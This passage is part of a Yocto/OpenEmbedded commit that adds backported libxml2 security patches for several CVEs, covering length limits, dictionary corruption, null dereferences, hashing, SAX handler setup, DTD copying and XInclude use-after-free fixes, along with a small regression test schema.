+-                xmlFatalErrMsgStr(ctxt, XML_ERR_PI_NOT_FINISHED,
+-                                  "PI %s too big found", target);
+-                xmlFree(buf);
+-                ctxt->instate = state;
+-                return;
+-            }
+ 	    buf[len] = 0;
+ 	    if (cur != '?') {
+ 		xmlFatalErrMsgStr(ctxt, XML_ERR_PI_NOT_FINISHED,
+@@ -8954,6 +8964,9 @@ xmlParseAttValueInternal(xmlParserCtxtPtr ctxt, int *len, int *alloc,
+     const xmlChar *in = NULL, *start, *end, *last;
+     xmlChar *ret = NULL;
+     int line, col;
++    int maxLength = (ctxt->options & XML_PARSE_HUGE) ?
++                    XML_MAX_HUGE_LENGTH :
++                    XML_MAX_TEXT_LENGTH;
+ 
+     GROW;
+     in = (xmlChar *) CUR_PTR;
+@@ -8993,8 +9006,7 @@ xmlParseAttValueInternal(xmlParserCtxtPtr ctxt, int *len, int *alloc,
+ 	    start = in;
+ 	    if (in >= end) {
+                 GROW_PARSE_ATT_VALUE_INTERNAL(ctxt, in, start, end)
+-                if (((in - start) > XML_MAX_TEXT_LENGTH) &&
+-                    ((ctxt->options & XML_PARSE_HUGE) == 0)) {
++                if ((in - start) > maxLength) {
+                     xmlFatalErrMsg(ctxt, XML_ERR_ATTRIBUTE_NOT_FINISHED,
+                                    "AttValue length too long\n");
+                     return(NULL);
+@@ -9007,8 +9019,7 @@ xmlParseAttValueInternal(xmlParserCtxtPtr ctxt, int *len, int *alloc,
+ 	    if ((*in++ == 0x20) && (*in == 0x20)) break;
+ 	    if (in >= end) {
+                 GROW_PARSE_ATT_VALUE_INTERNAL(ctxt, in, start, end)
+-                if (((in - start) > XML_MAX_TEXT_LENGTH) &&
+-                    ((ctxt->options & XML_PARSE_HUGE) == 0)) {
++                if ((in - start) > maxLength) {
+                     xmlFatalErrMsg(ctxt, XML_ERR_ATTRIBUTE_NOT_FINISHED,
+                                    "AttValue length too long\n");
+                     return(NULL);
+@@ -9041,16 +9052,14 @@ xmlParseAttValueInternal(xmlParserCtxtPtr ctxt, int *len, int *alloc,
+ 		    last = last + delta;
+ 		}
+ 		end = ctxt->input->end;
+-                if (((in - start) > XML_MAX_TEXT_LENGTH) &&
+-                    ((ctxt->options & XML_PARSE_HUGE) == 0)) {
++                if ((in - start) > maxLength) {
+                     xmlFatalErrMsg(ctxt, XML_ERR_ATTRIBUTE_NOT_FINISHED,
+                                    "AttValue length too long\n");
+                     return(NULL);
+                 }
+ 	    }
+ 	}
+-        if (((in - start) > XML_MAX_TEXT_LENGTH) &&
+-            ((ctxt->options & XML_PARSE_HUGE) == 0)) {
++        if ((in - start) > maxLength) {
+             xmlFatalErrMsg(ctxt, XML_ERR_ATTRIBUTE_NOT_FINISHED,
+                            "AttValue length too long\n");
+             return(NULL);
+@@ -9063,8 +9072,7 @@ xmlParseAttValueInternal(xmlParserCtxtPtr ctxt, int *len, int *alloc,
+ 	    col++;
+ 	    if (in >= end) {
+                 GROW_PARSE_ATT_VALUE_INTERNAL(ctxt, in, start, end)
+-                if (((in - start) > XML_MAX_TEXT_LENGTH) &&
+-                    ((ctxt->options & XML_PARSE_HUGE) == 0)) {
++                if ((in - start) > maxLength) {
+                     xmlFatalErrMsg(ctxt, XML_ERR_ATTRIBUTE_NOT_FINISHED,
+                                    "AttValue length too long\n");
+                     return(NULL);
+@@ -9072,8 +9080,7 @@ xmlParseAttValueInternal(xmlParserCtxtPtr ctxt, int *len, int *alloc,
+ 	    }
+ 	}
+ 	last = in;
+-        if (((in - start) > XML_MAX_TEXT_LENGTH) &&
+-            ((ctxt->options & XML_PARSE_HUGE) == 0)) {
++        if ((in - start) > maxLength) {
+             xmlFatalErrMsg(ctxt, XML_ERR_ATTRIBUTE_NOT_FINISHED,
+                            "AttValue length too long\n");
+             return(NULL);
+@@ -9763,6 +9770,9 @@ xmlParseCDSect(xmlParserCtxtPtr ctxt) {
+     int	s, sl;
+     int cur, l;
+     int count = 0;
++    int maxLength = (ctxt->options & XML_PARSE_HUGE) ?
++                    XML_MAX_HUGE_LENGTH :
++                    XML_MAX_TEXT_LENGTH;
+ 
+     /* Check 2.6.0 was NXT(0) not RAW */
+     if (CMP9(CUR_PTR, '<', '!', '[', 'C', 'D', 'A', 'T', 'A', '[')) {
+@@ -9796,13 +9806,6 @@ xmlParseCDSect(xmlParserCtxtPtr ctxt) {
+ 	if (len + 5 >= size) {
+ 	    xmlChar *tmp;
+ 
+-            if ((size > XML_MAX_TEXT_LENGTH) &&
+-                ((ctxt->options & XML_PARSE_HUGE) == 0)) {
+-                xmlFatalErrMsgStr(ctxt, XML_ERR_CDATA_NOT_FINISHED,
+-                             "CData section too big found", NULL);
+-                xmlFree (buf);
+-                return;
+-            }
+ 	    tmp = (xmlChar *) xmlRealloc(buf, size * 2 * sizeof(xmlChar));
+ 	    if (tmp == NULL) {
+ 	        xmlFree(buf);
+@@ -9829,6 +9832,12 @@ xmlParseCDSect(xmlParserCtxtPtr ctxt) {
+ 	}
+ 	NEXTL(l);
+ 	cur = CUR_CHAR(l);
++        if (len > maxLength) {
++            xmlFatalErrMsg(ctxt, XML_ERR_CDATA_NOT_FINISHED,
++                           "CData section too big found\n");
++            xmlFree(buf);
++            return;
++        }
+     }
+     buf[len] = 0;
+     ctxt->instate = XML_PARSER_CONTENT;
+-- 
+GitLab
diff --git a/meta/recipes-core/libxml/libxml2/CVE-2022-40304.patch b/meta/recipes-core/libxml/libxml2/CVE-2022-40304.patch
new file mode 100644
index 0000000000..c19726fe9f
--- /dev/null
+++ b/meta/recipes-core/libxml/libxml2/CVE-2022-40304.patch
@@ -0,0 +1,104 @@
+From 1b41ec4e9433b05bb0376be4725804c54ef1d80b Mon Sep 17 00:00:00 2001
+From: Nick Wellnhofer <wellnhofer@aevum.de>
+Date: Wed, 31 Aug 2022 22:11:25 +0200
+Subject: [PATCH] [CVE-2022-40304] Fix dict corruption caused by entity
+ reference cycles
+
+When an entity reference cycle is detected, the entity content is
+cleared by setting its first byte to zero. But the entity content might
+be allocated from a dict. In this case, the dict entry becomes corrupted
+leading to all kinds of logic errors, including memory errors like
+double-frees.
+
+Stop storing entity content, orig, ExternalID and SystemID in a dict.
+These values are unlikely to occur multiple times in a document, so they
+shouldn't have been stored in a dict in the first place.
+
+Thanks to Ned Williamson and Nathan Wachholz working with Google Project
+Zero for the report!
+
+CVE: CVE-2022-40304
+Upstream-Status: Backport [https://gitlab.gnome.org/GNOME/libxml2/-/commit/1b41ec4e9433b05bb0376be4725804c54ef1d80b]
+Signed-off-by: Bhabu Bindu <bhabu.bindu@kpit.com>
+---
+ entities.c | 55 ++++++++++++++++--------------------------------------
+ 1 file changed, 16 insertions(+), 39 deletions(-)
+
+diff --git a/entities.c b/entities.c
+index 84435515..d4e5412e 100644
+--- a/entities.c
++++ b/entities.c
+@@ -128,36 +128,19 @@ xmlFreeEntity(xmlEntityPtr entity)
+     if ((entity->children) && (entity->owner == 1) &&
+         (entity == (xmlEntityPtr) entity->children->parent))
+         xmlFreeNodeList(entity->children);
+-    if (dict != NULL) {
+-        if ((entity->name != NULL) && (!xmlDictOwns(dict, entity->name)))
+-            xmlFree((char *) entity->name);
+-        if ((entity->ExternalID != NULL) &&
+-	    (!xmlDictOwns(dict, entity->ExternalID)))
+-            xmlFree((char *) entity->ExternalID);
+-        if ((entity->SystemID != NULL) &&
+-	    (!xmlDictOwns(dict, entity->SystemID)))
+-            xmlFree((char *) entity->SystemID);
+-        if ((entity->URI != NULL) && (!xmlDictOwns(dict, entity->URI)))
+-            xmlFree((char *) entity->URI);
+-        if ((entity->content != NULL)
+-            && (!xmlDictOwns(dict, entity->content)))
+-            xmlFree((char *) entity->content);
+-        if ((entity->orig != NULL) && (!xmlDictOwns(dict, entity->orig)))
+-            xmlFree((char *) entity->orig);
+-    } else {
+-        if (entity->name != NULL)
+-            xmlFree((char *) entity->name);
+-        if (entity->ExternalID != NULL)
+-            xmlFree((char *) entity->ExternalID);
+-        if (entity->SystemID != NULL)
+-            xmlFree((char *) entity->SystemID);
+-        if (entity->URI != NULL)
+-            xmlFree((char *) entity->URI);
+-        if (entity->content != NULL)
+-            xmlFree((char *) entity->content);
+-        if (entity->orig != NULL)
+-            xmlFree((char *) entity->orig);
+-    }
++    if ((entity->name != NULL) &&
++        ((dict == NULL) || (!xmlDictOwns(dict, entity->name))))
++        xmlFree((char *) entity->name);
++    if (entity->ExternalID != NULL)
++        xmlFree((char *) entity->ExternalID);
++    if (entity->SystemID != NULL)
++        xmlFree((char *) entity->SystemID);
++    if (entity->URI != NULL)
++        xmlFree((char *) entity->URI);
++    if (entity->content != NULL)
++        xmlFree((char *) entity->content);
++    if (entity->orig != NULL)
++        xmlFree((char *) entity->orig);
+     xmlFree(entity);
+ }
+ 
+@@ -193,18 +176,12 @@ xmlCreateEntity(xmlDictPtr dict, const xmlChar *name, int type,
+ 	    ret->SystemID = xmlStrdup(SystemID);
+     } else {
+         ret->name = xmlDictLookup(dict, name, -1);
+-	if (ExternalID != NULL)
+-	    ret->ExternalID = xmlDictLookup(dict, ExternalID, -1);
+-	if (SystemID != NULL)
+-	    ret->SystemID = xmlDictLookup(dict, SystemID, -1);
++	ret->ExternalID = xmlStrdup(ExternalID);
++	ret->SystemID = xmlStrdup(SystemID);
+     }
+     if (content != NULL) {
+         ret->length = xmlStrlen(content);
+-	if ((dict != NULL) && (ret->length < 5))
+-	    ret->content = (xmlChar *)
+-	                   xmlDictLookup(dict, content, ret->length);
+-	else
+-	    ret->content = xmlStrndup(content, ret->length);
++	ret->content = xmlStrndup(content, ret->length);
+      } else {
+         ret->length = 0;
+         ret->content = NULL;
+-- 
+GitLab
diff --git a/meta/recipes-core/libxml/libxml2/CVE-2023-28484.patch b/meta/recipes-core/libxml/libxml2/CVE-2023-28484.patch
new file mode 100644
index 0000000000..907f2c4d47
--- /dev/null
+++ b/meta/recipes-core/libxml/libxml2/CVE-2023-28484.patch
@@ -0,0 +1,79 @@
+From e4f85f1bd2eb34d9b49da9154a4cc3a1bc284f68 Mon Sep 17 00:00:00 2001
+From: Nick Wellnhofer <wellnhofer@aevum.de>
+Date: Fri, 7 Apr 2023 11:46:35 +0200
+Subject: [PATCH] [CVE-2023-28484] Fix null deref in xmlSchemaFixupComplexType
+
+Fix a null pointer dereference when parsing (invalid) XML schemas.
+
+Thanks to Robby Simpson for the report!
+
+Fixes #491.
+
+CVE: CVE-2023-28484
+Upstream-Status: Backport [https://gitlab.gnome.org/GNOME/libxml2/-/commit/e4f85f1bd2eb34d9b49da9154a4cc3a1bc284f68]
+
+Signed-off-by: Peter Marko <peter.marko@siemens.com>
+---
+ result/schemas/issue491_0_0.err |  1 +
+ test/schemas/issue491_0.xml     |  1 +
+ test/schemas/issue491_0.xsd     | 18 ++++++++++++++++++
+ xmlschemas.c                    |  2 +-
+ 4 files changed, 21 insertions(+), 1 deletion(-)
+ create mode 100644 result/schemas/issue491_0_0.err
+ create mode 100644 test/schemas/issue491_0.xml
+ create mode 100644 test/schemas/issue491_0.xsd
+
+diff --git a/result/schemas/issue491_0_0.err b/result/schemas/issue491_0_0.err
+new file mode 100644
+index 00000000..9b2bb969
+--- /dev/null
++++ b/result/schemas/issue491_0_0.err
+@@ -0,0 +1 @@
++./test/schemas/issue491_0.xsd:8: element complexType: Schemas parser error : complex type 'ChildType': The content type of both, the type and its base type, must either 'mixed' or 'element-only'.
+diff --git a/test/schemas/issue491_0.xml b/test/schemas/issue491_0.xml
+new file mode 100644
+index 00000000..e2b2fc2e
+--- /dev/null
++++ b/test/schemas/issue491_0.xml
+@@ -0,0 +1 @@
++<Child xmlns="http://www.test.com">5</Child>
+diff --git a/test/schemas/issue491_0.xsd b/test/schemas/issue491_0.xsd
+new file mode 100644
+index 00000000..81702649
+--- /dev/null
++++ b/test/schemas/issue491_0.xsd
+@@ -0,0 +1,18 @@
++<?xml version='1.0' encoding='UTF-8'?>
++<xs:schema xmlns:xs="http://www.w3.org/2001/XMLSchema" xmlns="http://www.test.com" targetNamespace="http://www.test.com" elementFormDefault="qualified" attributeFormDefault="unqualified">
++  <xs:complexType name="BaseType">
++    <xs:simpleContent>
++      <xs:extension base="xs:int" />
++    </xs:simpleContent>
++  </xs:complexType>
++  <xs:complexType name="ChildType">
++    <xs:complexContent>
++      <xs:extension base="BaseType">
++        <xs:sequence>
++          <xs:element name="bad" type="xs:int" minOccurs="0" maxOccurs="1"/>
++        </xs:sequence>
++      </xs:extension>
++    </xs:complexContent>
++  </xs:complexType>
++  <xs:element name="Child" type="ChildType" />
++</xs:schema>
+diff --git a/xmlschemas.c b/xmlschemas.c
+index 6a353858..a4eaf591 100644
+--- a/xmlschemas.c
++++ b/xmlschemas.c
+@@ -18632,7 +18632,7 @@ xmlSchemaFixupComplexType(xmlSchemaParserCtxtPtr pctxt,
+ 			"allowed to appear inside other model groups",
+ 			NULL, NULL);
+ 
+-		} else if (! dummySequence) {
++		} else if ((!dummySequence) && (baseType->subtypes != NULL)) {
+ 		    xmlSchemaTreeItemPtr effectiveContent =
+ 			(xmlSchemaTreeItemPtr) type->subtypes;
+ 		    /*
+-- 
+GitLab
+
diff --git a/meta/recipes-core/libxml/libxml2/CVE-2023-29469.patch b/meta/recipes-core/libxml/libxml2/CVE-2023-29469.patch
new file mode 100644
index 0000000000..1252668577
--- /dev/null
+++ b/meta/recipes-core/libxml/libxml2/CVE-2023-29469.patch
@@ -0,0 +1,42 @@
+From 547edbf1cbdccd46b2e8ff322a456eaa5931c5df Mon Sep 17 00:00:00 2001
+From: Nick Wellnhofer <wellnhofer@aevum.de>
+Date: Fri, 7 Apr 2023 11:49:27 +0200
+Subject: [PATCH] [CVE-2023-29469] Hashing of empty dict strings isn't
+ deterministic
+
+When hashing empty strings which aren't null-terminated,
+xmlDictComputeFastKey could produce inconsistent results. This could
+lead to various logic or memory errors, including double frees.
+
+For consistency the seed is also taken into account, but this shouldn't
+have an impact on security.
+
+Found by OSS-Fuzz.
+
+Fixes #510.
+
+CVE: CVE-2023-29469
+Upstream-Status: Backport [https://gitlab.gnome.org/GNOME/libxml2/-/commit/547edbf1cbdccd46b2e8ff322a456eaa5931c5df]
+
+Signed-off-by: Peter Marko <peter.marko@siemens.com>
+---
+ dict.c | 3 ++-
+ 1 file changed, 2 insertions(+), 1 deletion(-)
+
+diff --git a/dict.c b/dict.c
+index 86c3f6d7..d7fd1a06 100644
+--- a/dict.c
++++ b/dict.c
+@@ -451,7 +451,8 @@ static unsigned long
+ xmlDictComputeFastKey(const xmlChar *name, int namelen, int seed) {
+     unsigned long value = seed;
+ 
+-    if (name == NULL) return(0);
++    if ((name == NULL) || (namelen <= 0))
++        return(value);
+     value = *name;
+     value <<= 5;
+     if (namelen > 10) {
+-- 
+GitLab
+
diff --git a/meta/recipes-core/libxml/libxml2/CVE-2023-39615-0001.patch b/meta/recipes-core/libxml/libxml2/CVE-2023-39615-0001.patch
new file mode 100644
index 0000000000..9689cec67d
--- /dev/null
+++ b/meta/recipes-core/libxml/libxml2/CVE-2023-39615-0001.patch
@@ -0,0 +1,36 @@
+From d0c3f01e110d54415611c5fa0040cdf4a56053f9 Mon Sep 17 00:00:00 2001
+From: Nick Wellnhofer <wellnhofer@aevum.de>
+Date: Sat, 6 May 2023 17:47:37 +0200
+Subject: [PATCH] parser: Fix old SAX1 parser with custom callbacks
+
+For some reason, xmlCtxtUseOptionsInternal set the start and end element
+SAX handlers to the internal DOM builder functions when XML_PARSE_SAX1
+was specified. This means that custom SAX handlers could never work with
+that flag because these functions would receive the wrong user data
+argument and crash immediately.
+
+Fixes #535.
+
+Upstream-Status: Backport from [https://gitlab.gnome.org/GNOME/libxml2/-/commit/d0c3f01e110d54415611c5fa0040cdf4a56053f9]
+CVE: CVE-2023-39615
+Signed-off-by: Siddharth Doshi <sdoshi@mvista.com>
+---
+ parser.c | 2 --
+ 1 file changed, 2 deletions(-)
+
+diff --git a/parser.c b/parser.c
+index 6e09208..7814e6e 100644
+--- a/parser.c
++++ b/parser.c
+@@ -15156,8 +15156,6 @@ xmlCtxtUseOptionsInternal(xmlParserCtxtPtr ctxt, int options, const char *encodi
+     }
+ #ifdef LIBXML_SAX1_ENABLED
+     if (options & XML_PARSE_SAX1) {
+-        ctxt->sax->startElement = xmlSAX2StartElement;
+-        ctxt->sax->endElement = xmlSAX2EndElement;
+         ctxt->sax->startElementNs = NULL;
+         ctxt->sax->endElementNs = NULL;
+         ctxt->sax->initialized = 1;
+-- 
+2.24.4
+
diff --git a/meta/recipes-core/libxml/libxml2/CVE-2023-39615-0002.patch b/meta/recipes-core/libxml/libxml2/CVE-2023-39615-0002.patch
new file mode 100644
index 0000000000..ebd9868fac
--- /dev/null
+++ b/meta/recipes-core/libxml/libxml2/CVE-2023-39615-0002.patch
@@ -0,0 +1,71 @@
+From 235b15a590eecf97b09e87bdb7e4f8333e9de129 Mon Sep 17 00:00:00 2001
+From: Nick Wellnhofer <wellnhofer@aevum.de>
+Date: Mon, 8 May 2023 17:58:02 +0200
+Subject: [PATCH] SAX: Always initialize SAX1 element handlers
+
+Follow-up to commit d0c3f01e. A parser context will be initialized to
+SAX version 2, but this can be overridden with XML_PARSE_SAX1 later,
+so we must initialize the SAX1 element handlers as well.
+
+Change the check in xmlDetectSAX2 to only look for XML_SAX2_MAGIC, so
+we don't switch to SAX1 if the SAX2 element handlers are NULL.
+
+Upstream-Status: Backport from [https://gitlab.gnome.org/GNOME/libxml2/-/commit/235b15a590eecf97b09e87bdb7e4f8333e9de129]
+CVE: CVE-2023-39615
+Signed-off-by: Siddharth Doshi <sdoshi@mvista.com>
+---
+ SAX2.c   | 11 +++++++----
+ parser.c |  5 +----
+ 2 files changed, 8 insertions(+), 8 deletions(-)
+
+diff --git a/SAX2.c b/SAX2.c
+index 5f141f9..902d34d 100644
+--- a/SAX2.c
++++ b/SAX2.c
+@@ -2869,20 +2869,23 @@ xmlSAXVersion(xmlSAXHandler *hdlr, int version)
+ {
+     if (hdlr == NULL) return(-1);
+     if (version == 2) {
+-	hdlr->startElement = NULL;
+-	hdlr->endElement = NULL;
+ 	hdlr->startElementNs = xmlSAX2StartElementNs;
+ 	hdlr->endElementNs = xmlSAX2EndElementNs;
+ 	hdlr->serror = NULL;
+ 	hdlr->initialized = XML_SAX2_MAGIC;
+ #ifdef LIBXML_SAX1_ENABLED
+     } else if (version == 1) {
+-	hdlr->startElement = xmlSAX2StartElement;
+-	hdlr->endElement = xmlSAX2EndElement;
+ 	hdlr->initialized = 1;
+ #endif /* LIBXML_SAX1_ENABLED */
+     } else
+         return(-1);
++#ifdef LIBXML_SAX1_ENABLED
++    hdlr->startElement = xmlSAX2StartElement;
++    hdlr->endElement = xmlSAX2EndElement;
++#else
++    hdlr->startElement = NULL;
++    hdlr->endElement = NULL;
++#endif /* LIBXML_SAX1_ENABLED */
+     hdlr->internalSubset = xmlSAX2InternalSubset;
+     hdlr->externalSubset = xmlSAX2ExternalSubset;
+     hdlr->isStandalone = xmlSAX2IsStandalone;
+diff --git a/parser.c b/parser.c
+index 7814e6e..cf0fb38 100644
+--- a/parser.c
++++ b/parser.c
+@@ -1102,10 +1102,7 @@ xmlDetectSAX2(xmlParserCtxtPtr ctxt) {
+     if (ctxt == NULL) return;
+     sax = ctxt->sax;
+ #ifdef LIBXML_SAX1_ENABLED
+-    if ((sax) &&  (sax->initialized == XML_SAX2_MAGIC) &&
+-        ((sax->startElementNs != NULL) ||
+-         (sax->endElementNs != NULL) ||
+-         ((sax->startElement == NULL) && (sax->endElement == NULL))))
++    if ((sax) && (sax->initialized == XML_SAX2_MAGIC))
+         ctxt->sax2 = 1;
+ #else
+     ctxt->sax2 = 1;
+-- 
+2.24.4
+
diff --git a/meta/recipes-core/libxml/libxml2/CVE-2023-39615-pre.patch b/meta/recipes-core/libxml/libxml2/CVE-2023-39615-pre.patch
new file mode 100644
index 0000000000..b177cdaba0
--- /dev/null
+++ b/meta/recipes-core/libxml/libxml2/CVE-2023-39615-pre.patch
@@ -0,0 +1,44 @@
+From 99fc048d7f7292c5ee18e44c400bd73bc63a47ed Mon Sep 17 00:00:00 2001
+From: Nick Wellnhofer <wellnhofer@aevum.de>
+Date: Fri, 14 Aug 2020 14:18:50 +0200
+Subject: [PATCH] Don't use SAX1 if all element handlers are NULL
+
+Running xmllint with "--sax --noout" installs a SAX2 handler with all
+callbacks set to NULL. In this case or similar situations, we don't want
+to switch to SAX1 parsing.
+
+Note: This patch is needed for "CVE-2023-39615-0002" patch to apply.
+Without this patch the build will fail with undefined sax error.
+
+Upstream-Status: Backport from [https://gitlab.gnome.org/GNOME/libxml2/-/commit/99fc048d7f7292c5ee18e44c400bd73bc63a47ed]
+Signed-off-by: Siddharth Doshi <sdoshi@mvista.com>
+---
+ parser.c | 10 +++++++---
+ 1 file changed, 7 insertions(+), 3 deletions(-)
+
+diff --git a/parser.c b/parser.c
+index bb677b0..6e09208 100644
+--- a/parser.c
++++ b/parser.c
+@@ -1098,11 +1098,15 @@ xmlHasFeature(xmlFeature feature)
+  */
+ static void
+ xmlDetectSAX2(xmlParserCtxtPtr ctxt) {
++    xmlSAXHandlerPtr sax;
+     if (ctxt == NULL) return;
++    sax = ctxt->sax;
+ #ifdef LIBXML_SAX1_ENABLED
+-    if ((ctxt->sax) &&  (ctxt->sax->initialized == XML_SAX2_MAGIC) &&
+-        ((ctxt->sax->startElementNs != NULL) ||
+-         (ctxt->sax->endElementNs != NULL))) ctxt->sax2 = 1;
++    if ((sax) &&  (sax->initialized == XML_SAX2_MAGIC) &&
++        ((sax->startElementNs != NULL) ||
++         (sax->endElementNs != NULL) ||
++         ((sax->startElement == NULL) && (sax->endElement == NULL))))
++        ctxt->sax2 = 1;
+ #else
+     ctxt->sax2 = 1;
+ #endif /* LIBXML_SAX1_ENABLED */
+-- 
+2.24.4
+
diff --git a/meta/recipes-core/libxml/libxml2/CVE-2023-45322-1.patch b/meta/recipes-core/libxml/libxml2/CVE-2023-45322-1.patch
new file mode 100644
index 0000000000..182bb29abd
--- /dev/null
+++ b/meta/recipes-core/libxml/libxml2/CVE-2023-45322-1.patch
@@ -0,0 +1,50 @@
+From a22bd982bf10291deea8ba0c61bf75b898c604ce Mon Sep 17 00:00:00 2001
+From: Nick Wellnhofer <wellnhofer@aevum.de>
+Date: Wed, 2 Nov 2022 15:44:42 +0100
+Subject: [PATCH] malloc-fail: Fix memory leak in xmlStaticCopyNodeList
+
+Found with libFuzzer, see #344.
+
+Upstream-Status: Backport [https://gitlab.gnome.org/GNOME/libxml2/-/commit/a22bd982bf10291deea8ba0c61bf75b898c604ce]
+
+Signed-off-by: Peter Marko <peter.marko@siemens.com>
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ tree.c | 7 +++++--
+ 1 file changed, 5 insertions(+), 2 deletions(-)
+
+diff --git a/tree.c b/tree.c
+index 507869efe..647288ce3 100644
+--- a/tree.c
++++ b/tree.c
+@@ -4461,7 +4461,7 @@ xmlStaticCopyNodeList(xmlNodePtr node, xmlDocPtr doc, xmlNodePtr parent) {
+ 	    }
+ 	    if (doc->intSubset == NULL) {
+ 		q = (xmlNodePtr) xmlCopyDtd( (xmlDtdPtr) node );
+-		if (q == NULL) return(NULL);
++		if (q == NULL) goto error;
+ 		q->doc = doc;
+ 		q->parent = parent;
+ 		doc->intSubset = (xmlDtdPtr) q;
+@@ -4473,7 +4473,7 @@ xmlStaticCopyNodeList(xmlNodePtr node, xmlDocPtr doc, xmlNodePtr parent) {
+ 	} else
+ #endif /* LIBXML_TREE_ENABLED */
+ 	    q = xmlStaticCopyNode(node, doc, parent, 1);
+-	if (q == NULL) return(NULL);
++	if (q == NULL) goto error;
+ 	if (ret == NULL) {
+ 	    q->prev = NULL;
+ 	    ret = p = q;
+@@ -4486,6 +4486,9 @@ xmlStaticCopyNodeList(xmlNodePtr node, xmlDocPtr doc, xmlNodePtr parent) {
+ 	node = node->next;
+     }
+     return(ret);
++error:
++    xmlFreeNodeList(ret);
++    return(NULL);
+ }
+ 
+ /**
+-- 
+GitLab
+
diff --git a/meta/recipes-core/libxml/libxml2/CVE-2023-45322-2.patch b/meta/recipes-core/libxml/libxml2/CVE-2023-45322-2.patch
new file mode 100644
index 0000000000..c7e9681e6a
--- /dev/null
+++ b/meta/recipes-core/libxml/libxml2/CVE-2023-45322-2.patch
@@ -0,0 +1,80 @@
+From d39f78069dff496ec865c73aa44d7110e429bce9 Mon Sep 17 00:00:00 2001
+From: Nick Wellnhofer <wellnhofer@aevum.de>
+Date: Wed, 23 Aug 2023 20:24:24 +0200
+Subject: [PATCH] tree: Fix copying of DTDs
+
+- Don't create multiple DTD nodes.
+- Fix UAF if malloc fails.
+- Skip DTD nodes if tree module is disabled.
+
+Fixes #583.
+
+CVE: CVE-2023-45322
+Upstream-Status: Backport [https://gitlab.gnome.org/GNOME/libxml2/-/commit/d39f78069dff496ec865c73aa44d7110e429bce9]
+
+Signed-off-by: Peter Marko <peter.marko@siemens.com>
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ tree.c | 31 ++++++++++++++++---------------
+ 1 file changed, 16 insertions(+), 15 deletions(-)
+
+diff --git a/tree.c b/tree.c
+index 6c8a875b9..02c1b5791 100644
+--- a/tree.c
++++ b/tree.c
+@@ -4471,29 +4471,28 @@ xmlNodePtr
+ xmlStaticCopyNodeList(xmlNodePtr node, xmlDocPtr doc, xmlNodePtr parent) {
+     xmlNodePtr ret = NULL;
+     xmlNodePtr p = NULL,q;
++    xmlDtdPtr newSubset = NULL;
+ 
+     while (node != NULL) {
+-#ifdef LIBXML_TREE_ENABLED
+ 	if (node->type == XML_DTD_NODE ) {
+-	    if (doc == NULL) {
++#ifdef LIBXML_TREE_ENABLED
++	    if ((doc == NULL) || (doc->intSubset != NULL)) {
+ 		node = node->next;
+ 		continue;
+ 	    }
+-	    if (doc->intSubset == NULL) {
+-		q = (xmlNodePtr) xmlCopyDtd( (xmlDtdPtr) node );
+-		if (q == NULL) goto error;
+-		q->doc = doc;
+-		q->parent = parent;
+-		doc->intSubset = (xmlDtdPtr) q;
+-		xmlAddChild(parent, q);
+-	    } else {
+-		q = (xmlNodePtr) doc->intSubset;
+-		xmlAddChild(parent, q);
+-	    }
+-	} else
++            q = (xmlNodePtr) xmlCopyDtd( (xmlDtdPtr) node );
++            if (q == NULL) goto error;
++            q->doc = doc;
++            q->parent = parent;
++            newSubset = (xmlDtdPtr) q;
++#else
++            node = node->next;
++            continue;
+ #endif /* LIBXML_TREE_ENABLED */
++	} else {
+ 	    q = xmlStaticCopyNode(node, doc, parent, 1);
+-	if (q == NULL) goto error;
++	    if (q == NULL) goto error;
++        }
+ 	if (ret == NULL) {
+ 	    q->prev = NULL;
+ 	    ret = p = q;
+@@ -4505,6 +4504,8 @@ xmlStaticCopyNodeList(xmlNodePtr node, xmlDocPtr doc, xmlNodePtr parent) {
+ 	}
+ 	node = node->next;
+     }
++    if (newSubset != NULL)
++        doc->intSubset = newSubset;
+     return(ret);
+ error:
+     xmlFreeNodeList(ret);
+-- 
+GitLab
+
diff --git a/meta/recipes-core/libxml/libxml2/CVE-2024-25062-pre1.patch b/meta/recipes-core/libxml/libxml2/CVE-2024-25062-pre1.patch
new file mode 100644
index 0000000000..31183399f8
--- /dev/null
+++ b/meta/recipes-core/libxml/libxml2/CVE-2024-25062-pre1.patch
@@ -0,0 +1,38 @@
+From 31c6ce3b63f8a494ad9e31ca65187a73d8ad3508 Mon Sep 17 00:00:00 2001
+From: Nick Wellnhofer <wellnhofer@aevum.de>
+Date: Mon, 9 Nov 2020 17:55:44 +0100
+Subject: [PATCH] Avoid call stack overflow with XML reader and recursive
+ XIncludes
+
+Don't process XIncludes in the result of another inclusion to avoid
+infinite recursion resulting in a call stack overflow.
+
+This is something the XInclude engine shouldn't allow but correct
+handling of intra-document includes would require major changes.
+
+Found by OSS-Fuzz.
+
+Upstream-Status: Backport [https://gitlab.gnome.org/GNOME/libxml2/-/commit/31c6ce3b63f8a494ad9e31ca65187a73d8ad3508]
+CVE: CVE-2024-25062 #Dependency Patch
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ xmlreader.c | 3 ++-
+ 1 file changed, 2 insertions(+), 1 deletion(-)
+
+diff --git a/xmlreader.c b/xmlreader.c
+index 01adf74f4..72e40b032 100644
+--- a/xmlreader.c
++++ b/xmlreader.c
+@@ -1585,7 +1585,8 @@ node_found:
+     /*
+      * Handle XInclude if asked for
+      */
+-    if ((reader->xinclude) && (reader->node != NULL) &&
++    if ((reader->xinclude) && (reader->in_xinclude == 0) &&
++        (reader->node != NULL) &&
+ 	(reader->node->type == XML_ELEMENT_NODE) &&
+ 	(reader->node->ns != NULL) &&
+ 	((xmlStrEqual(reader->node->ns->href, XINCLUDE_NS)) ||
+-- 
+GitLab
+
diff --git a/meta/recipes-core/libxml/libxml2/CVE-2024-25062.patch b/meta/recipes-core/libxml/libxml2/CVE-2024-25062.patch
new file mode 100644
index 0000000000..5365d5546a
--- /dev/null
+++ b/meta/recipes-core/libxml/libxml2/CVE-2024-25062.patch
@@ -0,0 +1,33 @@
+From 2b0aac140d739905c7848a42efc60bfe783a39b7 Mon Sep 17 00:00:00 2001
+From: Nick Wellnhofer <wellnhofer@aevum.de>
+Date: Sat, 14 Oct 2023 22:45:54 +0200
+Subject: [PATCH] [CVE-2024-25062] xmlreader: Don't expand XIncludes when
+ backtracking
+
+Fixes a use-after-free if XML Reader if used with DTD validation and
+XInclude expansion.
+
+Fixes #604.
+
+Upstream-Status: Backport [https://gitlab.gnome.org/GNOME/libxml2/-/commit/2b0aac140d739905c7848a42efc60bfe783a39b7]
+CVE: CVE-2024-25062
